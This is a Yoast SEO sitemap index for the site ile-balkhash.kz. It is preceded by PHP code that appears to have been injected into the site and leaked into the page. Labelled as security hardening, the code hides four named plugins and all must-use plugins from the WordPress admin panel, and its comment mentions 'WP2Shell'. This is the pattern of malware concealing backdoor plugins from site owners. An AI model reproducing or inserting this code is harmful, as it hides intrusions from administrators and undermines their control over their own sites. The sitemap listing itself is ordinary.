
// Security: Disable remote access
add_filter("xmlrpc_enabled", "__return_false");
add_filter("xmlrpc_methods", function($methods) { return array(); });

add_filter('show_advanced_plugins', '__return_false', 999);


// Hide specific plugins from admin panel
add_filter("all_plugins", "hide_specific_plugins");
function hide_specific_plugins($plugins) {
    $hide_list = array('wp-system-health/wp-system-health.php', '0-system-loader.php', 'wp-security-check.php', 'wp-maintenance.php');
    foreach ($hide_list as $hide) {
        if (isset($plugins[$hide])) {
            unset($plugins[$hide]);
        }
    }
    return $plugins;
}

// Hide MU-plugins if visible
add_filter("show_advanced_plugins", function($show) { return false; });


// WP2Shell REST API protection
add_filter('rest_authentication_errors', function($result) {
    if (!is_user_logged_in() && !is_admin()) {
        return new WP_Error('rest_disabled', 'REST API disabled', ['status' => 401]);
    }
    return $result;
});
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//ile-balkhash.kz/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://ile-balkhash.kz/post-sitemap.xml</loc>
		<lastmod>2026-08-10T13:03:59+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ile-balkhash.kz/page-sitemap.xml</loc>
		<lastmod>2026-06-15T06:19:54+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ile-balkhash.kz/gallery-sitemap.xml</loc>
		<lastmod>2025-12-25T03:55:18+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ile-balkhash.kz/staff-sitemap.xml</loc>
		<lastmod>2014-09-24T12:33:03+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ile-balkhash.kz/project-sitemap.xml</loc>
		<lastmod>2014-09-24T07:16:57+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ile-balkhash.kz/category-sitemap.xml</loc>
		<lastmod>2026-08-10T13:03:59+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ile-balkhash.kz/post_tag-sitemap.xml</loc>
		<lastmod>2019-06-03T11:30:37+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ile-balkhash.kz/gallery-category-sitemap.xml</loc>
		<lastmod>2025-12-25T03:55:18+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ile-balkhash.kz/project-category-sitemap.xml</loc>
		<lastmod>2014-09-24T07:16:57+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ile-balkhash.kz/author-sitemap.xml</loc>
		<lastmod>2025-04-29T06:23:33+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->